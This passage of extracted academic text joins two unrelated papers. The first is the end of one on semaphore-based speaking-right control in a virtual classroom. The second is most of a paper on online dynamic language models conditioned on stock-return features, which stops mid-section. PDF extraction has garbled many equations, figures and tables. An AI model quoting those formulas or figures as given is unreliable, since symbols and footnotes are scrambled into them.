only, and then makes sense. Therefore, V <= 1, this means that any time a process can only be allowed to get the speech right. Therefore, we must resolve their conflicts arising from the common run-time, critical resources, and the conflict is the essence of competition [5]. 3.4 solution of resources competition conflict The process of multiple concurrent accesses to critical resources must be controlled to make the system to normal operation. With the aid of the process dispatching management game theory method in the operating system may solve this problem [6]. The introduction of semaphore S (initial value is 1) plus Priority Power and events Event strategy. In S can be P operation and V operation. Power and the Event is defined as: Power = 1 show that the teachers priority, Power = 0 shows that students priority, Event = 1 cancel the speech, Event = 2 suspend the speech, Event = 0 there is no immediate action; P(S, Power, Event) definition is as follows: 1) When Power=1 and S<0, if Event=1，system will eliminate the speech advancement resources of the current process, which causes it transform to listen state; If Event=2, system will eliminate the speech advancement resources of the current process, which is inserted into the head of the blocking queue at once; If Power=0 or S>0, system immediately enters (2); 2) S ＝ S － 1； 3) If S>=0, then this process continues to carry on; 4) If S <0, then the process is blocked, and it is inserted into the blocking queue of semaphore S, then the system re-schedule another process to put into operation. V(S) definition is as follows: 1) S=S+1； 2) If S>=0, then this process continues to carry on; 3) If S <= 0, which shows that there are some process that are blocked, the system must wake up the first blocking process in queue of semaphore S, so that it can be entered the ready queue and continue the operation of the process. 36 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 4. Implementation of collaborative mechanism IPremise: Makes the teacher process is ProcessT, and it has the highest priority; Makes the student i process is ProcessSi, and all students have the same level priority; Strategy: 1) when process ProcessT is running and applying for the speak right resources, the system adopts “deprivation of way”, namely according to the event type which is sent out by ProcessT, if it cancels the current process ProcessSi to speak, the system will deprive ProcessSi of the right to speak resources, transforms ProcessSi to the listen condition; If suspends current ProcessSi speaking, the system will eliminate ProcessSi the right to speak resources, and insert process ProcessSi into the first place of the student waiting blocking speech queue. 2) When a ProcessSi is running and applying for the speak right resources, the system will take “non- deprivation mode “, which enables the release of the current process that is using speak right resources, the system according to the principle of first come first served (FIFO), will wake up the first place of the student waiting blocking speech queue, and make it obtain access to critical resources. Finally an explanation point: When students are in the waiting blocking process speech queue, the state of the ProcessSi is listening, that indicates waiting speech student retains the right to listen, which is consistent with the actual classroom. Implementation parts of the codes are as follows: Teacher process control routine similar as follows: ProcessT_Work Begin …… P(S,1,1 or 2)；//apply for speak right resources // or cancel / suspend the current students to speak T Process speak；//teaching …… T Process ask question；//for students V(S)； //release speak right resources …… End; Every student process control routine similar as follows: ProcessSi_Work(i) Begin …… Si Listen to teacher’s lecture；//in listening state …… P(S,0,0)； // apply for speak right resources Si Process speak；//for student V(S)； //release speak right resources …… End; Research of Virtual Network Classroom Collaborative Mechanism Based on Petri Net 37 5. Conclusion The Research of Virtual Classroom’s Collaborative Mechanism discussed in this paper have decomposed the complex question into simple forms very much, which has highly versatile and scientific rigor, and it provides a better model and a good method for other similar research, so it has high practical and referenced value . The author has utilized this model method successfully, which is designed for the actual development work of the Chinese some university distance learning system, and it has made the very good movement progress. Acknowledgment The Research is supported by the State and Provincial Joint Engineering Laboratory of Advanced Network, Monitoring and Control. (Financing projects No. GSYSJ2016014). References [1] Yu Huang, Wenhui Hu, Xin Gao, Hart-pin Wang, “WSCI Formal Model Analysis Based on Petri Nets”, Computer Engineering & Science, vol. 31, pp. 60-63, Octoble 2009 [2] Yebai Li, Fuqi Mao, “Research of the Verification in Workflow Process Modeling on the Application of Petri Nets ”, 2010. IC4E,10. International Conference on , Sanya, pp. 21 – 24, January 2010 [3] Zouaghi, L.; Wagner, A.; Badreddin, E., “Hybrid, recursive, nested monitoring of control systems using Petri nets and particle filters ”, Dependable Systems and Networks Workshops (DSN-W), 2010 International Conference on, Chicago， pp. 73 – 79, August 2010 [4] Arpaia, P.; Fiscarelli, L.; La Commara, G.; Romano, F., “A Petri Net-Based Software Synchronizer for Automatic Measurement Systems ”, Instrumentation and Measurement, IEEE Transactions on, vol. 60, pp. 319 – 328, January 2011 [5] Mahgoub H Hammad, Alsadig Mohammed, Moawia E. Eldow . , “Design an electronic system use the audio fingerprint to access virtual classroom using Artificial Neural Networks”, Computer, Communications, and Control Technology (I4CT), 2015 International Conference on, Kuching, Malaysia， pp. 578-585, April 2015 [6] Ziyue Ma , Yin Tong , Zhiwu Li , Alessandro Giua. “Basis Marking Representation of Petri Net Reachability Spaces and Its Application to the Reachability Problem”, IEEE Transactions on Automatic Control, vol. 3, pp. 1078 - 1093, May 2016 work_yiggwirfrrdmxotzboejxtmxuy ---- Dynamic Language Models for Streaming Text Dani Yogatama∗ Chong Wang∗ Bryan R. Routledge† Noah A. Smith∗ Eric P. Xing∗ ∗School of Computer Science †Tepper School of Business Carnegie Mellon University Pittsburgh, PA 15213, USA ∗{dyogatama,chongw,nasmith,epxing}@cs.cmu.edu, †routledge@cmu.edu Abstract We present a probabilistic language model that captures temporal dynamics and conditions on arbitrary non-linguistic context features. These context features serve as important indicators of language changes that are otherwise difficult to capture using text data by itself. We learn our model in an efficient online fashion that is scalable for large, streaming data. With five streaming datasets from two different genres— economics news articles and social media—we evaluate our model on the task of sequential language modeling. Our model consistently outperforms competing models. 1 Introduction Language models are a key component in many NLP applications, such as machine translation and ex- ploratory corpus analysis. Language models are typi- cally assumed to be static—the word-given-context distributions do not change over time. Examples include n-gram models (Jelinek, 1997) and proba- bilistic topic models like latent Dirichlet allocation (Blei et al., 2003); we use the term “language model” to refer broadly to probabilistic models of text. Recently, streaming datasets (e.g., social media) have attracted much interest in NLP. Since such data evolve rapidly based on events in the real world, as- suming a static language model becomes unrealistic. In general, more data is seen as better, but treating all past data equally runs the risk of distracting a model with irrelevant evidence. On the other hand, cau- tiously using only the most recent data risks overfit- ting to short-term trends and missing important time- insensitive effects (Blei and Lafferty, 2006; Wang et al., 2008). Therefore, in this paper, we take steps toward methods for capturing long-range temporal dynamics in language use. Our model also exploits observable context vari- ables to capture temporal variation that is otherwise difficult to capture using only text. Specifically for the applications we consider, we use stock market data as exogenous evidence on which the language model depends. For example, when an important company’s price moves suddenly, the language model should be based not on the very recent history, but should be similar to the language model for a day when a similar change happened, since people are likely to say similar things (either about that com- pany, or about conditions relevant to the change). Non-linguistic contexts such as stock price changes provide useful auxiliary information that might indi- cate the similarity of language models across differ- ent timesteps. We also turn to a fully online learning framework (Cesa-Bianchi and Lugosi, 2006) to deal with non- stationarity and dynamics in the data that necessitate adaptation of the model to data in real time. In on- line learning, streaming examples are processed only when they arrive. Online learning also eliminates the need to store large amounts of data in memory. Strictly speaking, online learning is distinct from stochastic learning, which for language models built on massive datasets has been explored by Hoffman et al. (2013) and Wang et al. (2011). Those tech- niques are still for static modeling. Language model- ing for streaming datasets in the context of machine translation was considered by Levenberg and Os- borne (2009) and Levenberg et al. (2010). Goyal et al. (2009) introduced a streaming algorithm for large scale language modeling by approximating n- gram frequency counts. We propose a general online learning algorithm for language modeling that draws inspiration from regret minimization in sequential predictions (Cesa-Bianchi and Lugosi, 2006) and on- 181 Transactions of the Association for Computational Linguistics, 2 (2014) 181–192. Action Editor: Eric Fosler-Lussier. Submitted 10/2013; Revised 2/2014; Published 4/2014. c©2014 Association for Computational Linguistics. line variational algorithms (Sato, 2001; Honkela and Valpola, 2003). To our knowledge, our model is the first to bring together temporal dynamics, conditioning on non- linguistic context, and scalable online learning suit- able for streaming data and extensible to include topics and n-gram histories. The main idea of our model is independent of the choice of the base lan- guage model (e.g., unigrams, bigrams, topic models, etc.). In this paper, we focus on unigram and bi- gram language models in order to evaluate the basic idea on well understood models, and to show how it can be extended to higher-order n-grams. We leave extensions to topic models for future work. We propose a novel task to evaluate our proposed language model. The task is to predict economics- related text at a given time, taking into account the changes in stock prices up to the corresponding day. This can be seen an inverse of the setup considered by Lavrenko et al. (2000), where news is assumed to influence stock prices. We evaluate our model on economics news in various languages (English, German, and French), as well as Twitter data. 2 Background In this section, we first discuss the background for sequential predictions then describe how to formulate online language modeling as sequential predictions. 2.1 Sequential Predictions Let w1,w2, . . . ,wT be a sequence of response vari- ables, revealed one at a time. The goal is to design a good learner to predict the next response, given previous responses and additional evidence which we denote by xt ∈ RM (at time t). Throughout this paper, we use the term features for x. Specifically, at each round t, the learner receives xt and makes a pre- diction ŵt, by choosing a parameter vector αt ∈ RM . In this paper, we refer to α as feature coefficients. There has been an enormous amount of work on online learning for sequential predictions, much of it building on convex optimization. For a sequence of loss functions `1,`2, . . . ,`T (parameterized by α), an online learning algorithm is a strategy to minimize the regret, with respect to the best fixed α∗ in hind- sight.1 Regret guarantees assume a Lipschitz con- 1Formally, the regret is defined as RegretT (α ∗) = dition on the loss function ` that can be prohibitive for complex models. See Cesa-Bianchi and Lugosi (2006), Rakhlin (2009), Bubeck (2011), and Shalev- Shwartz (2012) for in-depth discussion and review. There has also been work on online and stochastic learning for Bayesian models (Sato, 2001; Honkela and Valpola, 2003; Hoffman et al., 2013), based on variational inference. The goal is to approximate pos- terior distributions of latent variables when examples arrive one at a time. In this paper, we will use both kinds of techniques to learn language models for streaming datasets. 2.2 Problem Formulation Consider an online language modeling problem, in the spirit of sequential predictions. The task is to build a language model that accurately predicts the texts generated on day t, conditioned on observ- able features up to day t, x1:t. Every day, after the model makes a prediction, the actual texts wt are revealed and we suffer a loss. The loss is de- fined as the negative log likelihood of the model `t = − log p(wt | α,β1:t−1,x1:t−1,n1:t−1), where α and β1:T are the model parameters and n is a back- ground distribution (details are given in §3.2). We can then update the model and proceed to day t + 1. Notice the similarity to the sequential prediction de- scribed above. Importantly, this is a realistic setup for building evolving language models from large-scale streaming datasets. 3 Model 3.1 Notation We index timesteps by t ∈ {1, . . . ,T} and word types by v ∈ {1, . . . ,V}, both are always given as subscripts. We denote vectors in boldface and use 1 : T as a shorthand for {1,2, . . . ,T}. We assume words of the form {wt}Tt=1 for wt ∈ RV , which is the vector of word frequences at timetstep t. Non- linguistic context features are {xt}Tt=1 for xt ∈ RM . The goal is to learn parameters α and β1:T , which will be described in detail next. 3.2 Generative Story The main idea of our model is illustrated by the fol- lowing generative story for the unigram languagePT t=1 `t(xt,αt,wt)− infα∗ PT t=1 `t(xt,α ∗,wt). 182 model. (We will discuss the extension to higher-order language models later.) A graphical representation of our proposed model is given in Figure 1. 1. Draw feature coefficients α ∼ N(0,λI).2 Here α is a vector in RM , where M is the dimension- ality of the feature vector. 2. For each timestep t: (a) Observe non-linguistic context features xt. (b) Draw βt ∼ N (∑t−1 k=1 δk exp(α>f(xt,xk))Pt−1 j=1 δj exp(α >f(xt,xj)) βk,ϕI ) . Here, βt is a vector in R V , where V is the size of the word vocabulary, ϕ is the variance parameter and δk is a fixed hyperparameter; we discuss them below. (c) For each word wt,v, draw wt,v ∼ Categorical ( exp(n1:t−1,v+βt,v)P j∈V exp(n1:t−1,j+βt,j) ) . In the last step, βt and n are mapped to the V - dimensional simplex, forming a distribution over words. n1:t−1 ∈ RV is a background (log) distri- bution, inspired by a similar idea in Eisenstein et al. (2011). In this paper, we set n1:t−1,v to be the log- frequency of v up to time t−1. We can interpret β as a time-dependent deviation from the background log-frequencies that incorporates world-context. This deviation comes in the form of a weighted average of earlier deviation vectors. The intuition behind the model is that the probabil- ity of a word appearing at day t depends on the back- ground log-frequencies, the deviation coefficients of the word at previous timesteps β1:t−1, and the sim- ilarity of current conditions of the world (based on observable features x) to previous timesteps through f(xt,xk). That is, f is a function that takes d- dimensional feature vectors at two timesteps xt and xk and returns a similarity vector f(xt,xk) ∈ RM (see §6.1.1 for an example of f that we use in our experiments). The similarity is parameterized by α, and decays over time with rate δk. In this work, we assume a fixed window size c (i.e., we consider c most recent timesteps), so that δ1:t−c−1 = 0 and δt−c:t−1 = 1. This allows up to cth order depen- dencies.3 Setting δ this way allows us to bound the 2Feature coefficients α can be also drawn from other distri- butions such as α ∼ Laplace(0,λ). 3In online Bayesian learning, it is known that forgetting inaccurate estimates from earlier timesteps is important (Sato, � xtxsxrxq wq wr ws wt �t�s�r�q ↵ NrNq Ns Nt T Figure 1: Graphical representation of the model. The subscript indices q,r,s are shorthands for the previ- ous timesteps t − 3, t − 2, t − 1. Only four timesteps are shown here. There are arrows from previous βt−4,βt−5, . . . ,βt−c to βt, where c is the window size as described in §3.2. They are not shown here, for read- ability. number of past vectors β that need to be kept in memory. We set β0 to 0. Although the generative story described above is for unigram language models, extensions can be made to more complex models (e.g., mixture of un- igrams, topic models, etc.) and to longer n-gram contexts. In the case of topic models, the model will be related to dynamic topic models (Blei and Lafferty, 2006) augmented by context features, and the learning procedure in §4 can be used to perform online learning of dynamic topic models. However, our model captures longer-range dependencies than dynamic topic models, and can condition on non- linguistic features or metadata. In the case of higher- order n-grams, one simple way is to draw more β, one for each history. For example, for a bigram model, β is in RV 2 , rather than RV in the unigram model. We consider both unigram and bigram lan- guage models in our experiments in §6. However, the main idea presented in this paper is largely indepen- dent of the base model. Related work. Mimno and McCallum (2008) and Eisenstein et al. (2010) similarly conditioned text on 2001; Honkela and Valpola, 2003). Since we set δ1:t−c−1 = 0, at every timestep t, δk leads to forgetting older examples. 183 observable features (e.g., author, publication venue, geography, and other document-level metadata), but conducted inference in a batch setting, thus their ap- proaches are not suitable for streaming data. It is not immediately clear how to generalize their approach to dynamic settings. Algorithmically, our work comes closest to the online dynamic topic model of Iwata et al. (2010), except that we also incorporate context features. 4 Learning and Inference The goal of the learning procedure is to minimize the overall negative log likelihood, − log L(D) = − log ∫ dβ1:Tp(β1:T | α,x1:T )p(w1:T | β1:T ,n). However, this quantity is intractable. Instead, we derive an upper bound for this quantity and minimize that upper bound. Using Jensen’s inequality, the vari- ational upper bound on the negative log likelihood is: − log L(D) ≤− ∫ dβ1:Tq(β1:T | γ1:T ) (4) log p(β1:T | α,x1:T )p(w1:T | β1:T ,n) q(β1:T | γ1:T ) . Specifically, we use mean-field variational inference where the variables in the variational distribution q are completely independent. We use Gaussian distri- butions as our variational distributions for β, denoted by γ in the bound in Eq. 4. We denote the parameters of the Gaussian variational distribution for βt,v (word v at timestep t) by µt,v (mean) and σt,v (variance). Figure 2 shows the functional form of the varia- tional bound that we seek to minimize, denoted by B̂. The two main steps in the optimization of the bound are inferring βt and updating feature coefficients α. We next describe each step in detail. 4.1 Learning The goal of the learning procedure is to minimize the upper bound in Figure 2 with respect to α. However, since the data arrives in an online fashion, and speed is very important for processing streaming datasets, the model needs to be updated at every timestep t (in our experiments, daily). Notice that at timestep t, we only have access to x1:t and w1:t, and we perform learning at every timestep after the text for the current timestep wt is revealed. We do not know xt+1:T and wt+1:T . Nonetheless, we want to update our model so that it can make a better prediction at t + 1. Therefore, we can only minimize the bound until timestep t. Let Ck , exp(α >f(xt,xk))Pt−1 j=t−c exp(α >f(xt,xj)) . Our learning al- gorithm is a variational Expectation-Maximization algorithm (Wainwright and Jordan, 2008). E-step Recall that we use variational inference and the variational parameters for β are µ and σ. As shown in Figure 2, since the log-sum-exp in the last term of B is problematic, we introduce additional variational parameters ζ to simplify B and obtain B̂ (Eqs. 2–3). The E-step deals with all the local variables µ, σ, and ζ. Fixing other variables and taking the derivative of the bound B̂ w.r.t. ζt and setting it to zero, we obtain the closed-form update for ζt: ζt =∑ v∈V exp (n1:t−1,v) exp ( µt,v + σt,v 2 ) . To minimize with respect to µt and σt, we apply gradient-based methods since there are no closed- form solutions. The derivative w.r.t. µt,v is: ∂B̂ ∂µt,v = µt,v −Ckµk,v ϕ −nt,v + nt ζt exp (n1:t−1,v) exp ( µt,v + σt,v 2 ) , where nt = ∑ v∈V nt,v. The derivative w.r.t. σt,v is: ∂B̂ ∂σt,v = 1 2σt,v + 1 2ϕ + nt 2ζt exp (n1:t−1,v) exp ( µt,v + σt,v 2 ) . Although we require iterative methods in the E-step, we find it to be reasonably fast in practice.4 Specifi- cally, we use the L-BFGS quasi-Newton algorithm (Liu and Nocedal, 1989). We can further improve the bound by updating the variational parameters for timestep 1 : t−1, i.e., µ1:t−1 and σ1:t−1, as well. However, this will require storing the texts from previous timesteps. Addition- ally, this will complicate the M-step update described 4Approximately 16.5 seconds/day (walltime) to learn the model on the EN:NA dataset on a 2.40GHz CPU with 24GB memory. 184 B =− T∑ t=1 Eq[log p(βt | βk,α,xt)]− T∑ t=1 Eq[log p(wt | βt,nt)]−H(q) (1) = T∑ t=1    1 2 ∑ j∈V log σt,j ϕ −Eq  − ( βt − ∑t−1 k=t−c Ckβk )2 2ϕ  −Eq   ∑ v∈wt n1:t−1,v + βt,v − log ∑ j∈V exp(n1:t−1,j + βt,j)      (2) ≤ T∑ t=1    1 2 ∑ j∈V log σt,v ϕ + ( µt − ∑t−1 k=t−c Ckµk )2 2ϕ + σt + ∑t−1 k=t−c C 2 kσk 2ϕ − ∑ v∈wt  µt,v − log ζt − 1 ζt ∑ j∈V exp (n1:t−1,j) exp ( µt,j + σt,j 2 )      + const (3) Figure 2: The variational bound that we seek to minimize, B. H(q) is the entropy of the variational distribution q. The derivation from line 1 to line 2 is done by replacing the probability distributions p(βt | βk,α,xt) and p(wt | βt,nt) by their respective functional forms. Notice that in line 3 we compute the expectations under the variational distributions and further bound B by introducing additional variational parameters ζ using Jensen’s inequality on the log-sum-exp in the last term. We denote the new bound B̂. below. Therefore, for each s < t, we choose to fix µs and σs once they are learned at timestep s. M-step In the M-step, we update the global pa- rameter α, fixing µ1:t. Fixing other parameters and taking the derivative of B̂ w.r.t. α, we obtain:5 ∂B̂ ∂α = (µt − ∑t−1 k=t−c Ckµk)(− ∑t−1 k=t−c ∂Ck ∂α ) ϕ + ∑t−1 k=t−c Ckσk ∂Ck ∂α ϕ , where: ∂Ck ∂α =Ckf(xt,xk) −Ck ∑t−1 s=t−c f(xt,xs) exp(α >f(xt,xs))∑t−1 s=t−c exp(α >f(xt,xs)) . We follow the convex optimization strategy and sim- ply perform a stochastic gradient update: αt+1 = αt + ηt ∂B̂ ∂αt (Zinkevich, 2003). While the variational bound B̂ is not convex, given the local variables µ1:t 5In our implementation, we augment α with a squared L2 regularization term (i.e., we assume that α is drawn from a normal distribution with mean zero and variance λ) and use the FOBOS algorithm (Duchi and Singer, 2009). The derivative of the regularization term is simple and is not shown here. Of course, other regularizers (e.g., the L1-norm, which we use for other parameters, or the L1/∞-norm) can also be explored. and σ1:t, optimizing α at timestep t without know- ing the future becomes a convex problem.6 Since we do not reestimate µ1:t−1 and σ1:t−1 in the E-step, the choice to perform online gradient descent instead of iteratively performing batch optimization at every timestep is theoretically justified. Notice that our overall learning procedure is still to minimize the variational upper bound B̂. All these choices are made to make the model suitable for learning in real time from large streaming datasets. Preliminary experiments showed that performing more than one EM iteration per day does not consid- erably improve performance, so in our experiments we perform one EM iteration per day. To learn the parameters of the model, we rely on approximations and optimize an upper bound B̂. We have opted for this approach over alternatives (such as MCMC methods) because of our interest in the online, large-data setting. Our experiments show that we are still able to learn reasonable parameter esti- mates by optimizing B̂. Like online variational meth- ods for other latent-variable models such as LDA (Sato, 2001; Hoffman et al., 2013), open questions re- main about the tightness of such approximations and the identifiability of model parameters. We note, how- 6As a result, our algorithm is Hannan consistent w.r.t. the best fixed α (for B̂) in hindsight; i.e., the average regret goes to zero as T goes to ∞. 185 ever, that our model does not include latent mixtures of topics and may be generally easier to estimate. 5 Prediction As described in §2.2, our model is evaluated by the loss suffered at every timestep, where the loss is defined as the negative log likelihood of the model on text at timestep wt. Therefore, at each timestep t, we need to predict (the distribution of) wt. In order to do this, for each word v ∈ V , we simply compute the deviation means βt,v as weighted combinations of previous means, where the weights are determined by the world-context similarity encoded in x: Eq[βt,v | µt,v] = t−1∑ k=t−c exp(α>f(xt,xk))∑t−1 j=t−c exp(α >f(xt,xj)) µk,v. Recall that the word distribution that we use for prediction is obtained by applying the operator π that maps βt and n to the V -dimensional simplex, forming a distribution over words: π(βt,n1:t−1)v = exp(n1:t−1,v+βt,v)P j∈V exp(n1:t−1,j+βt,j) , where n1:t−1,v ∈ RV is a background distribution (the log-frequency of word v observed up to time t−1). 6 Experiments In our experiments, we consider the problem of pre- dicting economy-related text appearing in news and microblogs, based on observable features that reflect current economic conditions in the world at a given time. In the following, we describe our dataset in de- tail, then show experimental results on text prediction. In all experiments, we set the window size c = 7 (one week) or c = 14 (two weeks), λ = 1 2|V | (V is the size of vocabulary of the dataset under consideration), and ϕ = 1. 6.1 Dataset Our data contains metadata and text corpora. The metadata is used as our features, whereas the text corpora are used for learning language models and predictions. The dataset (excluding Twitter) can be downloaded at http://www.ark.cs.cmu. edu/DynamicLM. 6.1.1 Metadata We use end-of-day stock prices gathered from finance.yahoo.com for each stock included in the Standard & Poor’s 500 index (S&P 500). The index includes large (by market value) companies listed on US stock exchanges.7 We calculate daily (continuously compounded) returns for each stock, o: ro,t = log Po,t−log Po,t−1, where Po,t is the closing stock price.8 We make a simplifying assumption that text for day t is generated after Po,t is observed.9 In general, stocks trade Monday to Friday (except for federal holidays and natural disasters). For days when stocks do not trade, we set ro,t = 0 for all stocks since any price change is not observed. We transform returns into similarity values as fol- lows: f(xo,t,xo,k) = 1 iff sign(ro,t) = sign(ro,k) and 0 otherwise. While this limits the model by ig- noring the magnitude of price changes, it is still rea- sonable to capture the similarity between two days.10 There are 500 stocks in the S&P 500, so xt ∈ R500 and f(xt,xk) ∈ R500. 6.1.2 Text data We have five streams of text data. The first four corpora are news streams tracked through Reuters.11 Two of them are written in English, North American Business Report (EN:NA) and Japanese Investment News (EN:JP). The remaining two are German Eco- nomic News Service (DE, in German) and French Economic News Service (FR, in French). For all four of the Reuters streams, we collected news data over a period of thirteen months (392 days), 2012-05-26 to 2013-06-21. See Table 1 for descriptive statistics of these datasets. Numerical terms are mapped to a single word, and all letters are downcased. The last text stream comes from the Deca- hose/Gardenhose stream from Twitter. We collected public tweets that contain ticker symbols (i.e., sym- bols that are used to denote stocks of a particular company in a stock market), preceded by the dollar 7For a list of companies listed in the S&P 500 as of 2012, see http://en.wikipedia.org/wiki/List_ of_S\%26P_500_companies. This set was fixed during the time periods of all our experiments. 8We use the “adjusted close” on Yahoo that includes interim dividend cash flows and also adjusts for “splits” (changes in the number of outstanding shares). 9This is done in order to avoid having to deal with hourly timesteps. In addition, intraday price data is only available through commercial data provided. 10Note that daily stock returns are equally likely to be positive or negative and display little serial correlation. 11http://www.reuters.com 186 Dataset Total # Doc. Avg. # Doc. #Days Unigrams Bigrams Total # Tokens Size Vocab. Total # Tokens Size Vocab. EN:NA 86,683 223 392 28,265,550 10,000 11,804,201 5,000 EN:JP 70.807 182 392 16,026,380 10,000 7,047,095 5,000 FR 62,355 160 392 11,942,271 10,000 3,773,517 5,000 DE 51,515 132 392 9,027,823 10,000 3,499,965 5,000 Twitter 214,794 336 639 1,660,874 10,000 551,768 5,000 Table 1: Statistics about the datasets. Average number of documents (third column) is per day. sign $ (e.g., $GOOG, $MSFT, $AAPL, etc.). These tags are generally used to indicate tweets about the stock market. We look at tweets from the period 2011-01-01 to 2012-09-30 (639 days). As a result, we have approximately 100–800 tweets per day. We tokenized the tweets using the CMU ARK TweetNLP tools,12 numerical terms are mapped to a single word, and all letters are downcased. We perform two experiments using unigram and bigram language models as the base models. For each dataset, we consider the top 10,000 unigrams after removing corpus-specific stopwords (the top 100 words with highest frequencies). For the bigram experiments, we only use 5,000 words to limit the number of unique bigrams so that we can simulate experiments for the entire time horizon in a reason- able amount of time. In standard open-vocabulary language modeling experiments, the treatment of un- known words deserves care. We have opted for a controlled, closed-vocabulary experiment, since stan- dard smoothing techniques will almost surely interact with temporal dynamics and context in interesting ways that are out of scope in the present work. 6.2 Baselines Since this is a forecasting task, at each timestep, we only have access to data from previous timesteps. Our model assumes that all words in all documents in a corpus come from a single multinomial distri- bution. Therefore, we compare our approach to the corresponding base models (standard unigram and bi- gram language models) over the same vocabulary (for each stream). The first one maintains counts of every word and updates the counts at each timestep. This corresponds to a base model that uses all of the avail- able data up to the current timestep (“base all”). The second one replaces counts of every word with the 12https://www.ark.cs.cmu.edu/TweetNLP counts from the previous timestep (“base one”). Ad- ditionally, we also compare with a base model whose counts decay exponentially (“base exp”). That is, the counts from previous timesteps decay by exp(−γs), where s is the distance between previous timesteps and the current timestep and γ is the decay constant. We set the decay constant γ = 1. We put a symmetric Dirichlet prior on the counts (“add-one” smoothing); this is analogous to our treatment of the background frequencies n in our model. Note that our model, similar to “base all,” uses all available data up to timestep t−1 when making predictions for timestep t. The window size c only determines which previ- ous timesteps’ models can be chosen for making a prediction today. The past models themselves are es- timated from all available data up to their respective timesteps. We also compare with two strong baselines: a lin- ear interpolation of “base one” models for the past week (“int. week”) and a linear interpolation of “base all” and “base one” (“int one all”). The interpolation weights are learned online using the normalized expo- nentiated gradient algorithm (Kivinen and Warmuth, 1997), which has been shown to enjoy a stronger regret guarantee compared to standard online gra- dient descent for learning a convex combination of weights. 6.3 Results We evaluate the perplexity on unseen dataset to eval- uate the performance of our model. Specifically, we use per-word predictive perplexity: perplexity = exp ( − ∑T t=1 log p(wt | α,x1:t,n1:t−1)∑T t=1 ∑ j∈V wt,j ) . Note that the denominator is the number of tokens up to timestep T . Lower perplexity is better. Table 2 and Table 3 show the perplexity results for 187 Dataset base all base one base exp int. week int. one all c = 7 c = 14 EN:NA 3,341 3,677 3,486 3,403 3,271 3,262 3,285 EN:JP 2,802 3,212 2,750 2,949 2,708 2,656 2,689 FR 3,603 3,910 3,678 3,625 3,416 3,404 3,438 DE 3,789 4,199 3,979 3,926 3,634 3,649 3,687 Twitter 3,880 6,168 5,133 5,859 4,047 3,801 3,819 Table 2: Perplexity results for our five data streams in the unigram experiments. The base models in “base all,” “base one,” and “base exp” are unigram language models. “int. week” is a linear interpolation of “base one” from the past week. “int. one all” is a linear interpolation of “base one” and “base all”. The rightmost two columns are versions of our model. Best results are highlighted in bold. Dataset base all base one base exp int. week int. one all c = 7 EN:NA 242 2,229 1,880 2,200 244 223 EN:JP 185 2,101 1,726 2,050 189 167 FR 159 2,084 1,707 2,068 166 139 DE 268 2,634 2,267 2,644 282 243 Twitter 756 4,245 4,253 5,859 4,046 739 Table 3: Perplexity results for our five data streams in the bigram experiments. The base models in “base all,” “base one,” and “base exp” are bigram language models. “int. week” is a linear interpolation of “base one” from the past week. “int. one all” is a linear interpolation of “base one” and “base all”. The rightmost column is a version of our model with c = 7. Best results are highlighted in bold. each of the datasets for unigram and bigram experi- ments respectively. Our model outperformed other competing models in all cases but one. Recall that we only define the similarity function of world context as: f(xo,t,xo,k) = 1 iff sign(ro,t) = sign(ro,k) and 0 otherwise. A better similarity function (e.g., one that takes into account market size of the company and the magnitude of increase or decrease in the stock price) might be able to improve the performance fur- ther. We leave this for future work. Furthermore, the variations can be captured using models from the past week. We discuss why increasing c from 7 to 14 did not improve performance of the model in more detail in §6.4. We can also see how the models performed over time. Figure 4 traces perplexity for four Reuters news stream datasets.13 We can see that in some cases the performance of the “base all” model degraded over time, whereas our model is more robust to temporal 13In both experiments, in order to manage the time and space complexities of updating β, we apply a sparsity shrinkage tech- nique by using OWL-QN (Andrew and Gao, 2007) when maxi- mizing it, with regularization constant set to 1. Intuitively, this is equivalent to encouraging the deviation vector to be sparse (Eisenstein et al., 2011). shifts. In the bigram experiments, we only ran our model with c = 7, since we need to maintain β in RV 2 , instead of RV in the unigram model. The goal of this experiment is to determine whether our method still adds benefit to more expressive language mod- els. Note that the weights of the linear interpolation models are also learned in an online fashion since there are no classical training, development, and test sets in our setting. Since the “base one” model per- formed poorly in this experiment, the performance of the interpolated models also suffered. For example, the “int. one all” model needed time to learn that the “base one” model has to be downweighted (we started with all interpolated models having uniform weights), so it was not able to outperform even the “base all” model. 6.4 Analysis and Discussion It should not be surprising that conditioning on world-context reduces perplexity (Cover and Thomas, 1991). A key attraction of our model, we believe, lies in the ability to inspect its parameters. Deviation coefficients. Inspecting the model al- lows us to gain insight into temporal trends. We 188 Twitter:Google timestep β 0 100 200 300 400 500 600 0. 0 0. 5 1. 0 1. 5 2. 0 googgoog @google@google google+google+ #goog#goog rGOOGrGOOG Twitter:Microsoft timestep β 0 100 200 300 400 500 600 0. 0 0. 5 1. 0 1. 5 microsoftmicrosoft msftmsft #microsoft#microsoft rMSFTrMSFT Figure 3: Deviation coefficients β over time for Google- and Microsoft-related words on Twitter with unigram base model (c = 7). Significant changes (increases or decreases) in the returns of Google and Microsoft stocks are usually followed by increases in β of related words. investigate the deviations learned by our model on the Twitter dataset. Examples are shown in Figure 3. The left plot shows β for four words related to Google: goog, #goog, @google, google+. For compari- son, we also show the return of Google stock for the corresponding timestep (scaled by 50 and centered at 0.5 for readability, smoothed using loess (Cleveland, 1979), denoted by rGOOG in the plot). We can see that significant changes of return of Google stocks (e.g., the rGOOG spikes between timesteps 50–100, 150–200, 490–550 in the plot) occurred alongside an increase in β of Google-related words. Similar trends can also be observed for Microsoft-related words in the right plot. The most significant loss of return of Microsoft stocks (the downward spike near timestep 500 in the plot) is followed by a sudden sharp increase in β of the words #microsoft and microsoft. Feature coefficients. We can also inspect the learned feature coefficients α to investigate which stocks have higher associations with the text that is generated. Our feature coefficients are designed to reflect which changes (or lack of changes) in stock prices influence the word distribution more, not which stocks are talked about more often. We find that the feature coefficients do not correlate with obvious company characteristics like market capi- talization (firm size). For example, on the Twitter dataset with bigram base models, the five stocks with the highest weights are: ConAgra Foods Inc., Intel Corp., Bristol-Myers Squibb, Frontier Communica- tions Corp., and Amazon.com Inc. Strongly negative weights tended to align with streams with less activ- time lags fr eq ue nc y 0 20 40 60 80 1 2 3 4 5 6 7 8 9 10 11 12 13 14 Figure 5: Distributions of the selection probabilities of models from the previous c = 14 timesteps, on the EN:NA dataset with unigram base model. For simplicity, we show E-step modes. The histogram shows that the model tends to favor models from days closer to the current date. ity, suggesting that these were being used to smooth across all c days of history. A higher weight for stock o implies an increase in probability of choosing mod- els from previous timesteps s, when the state of the world for the current timestep t and timestep s is the same (as represented by our similarity function) with respect to stock o (all other things being equal), and a decrease in probability for a lower weight. Selected models. 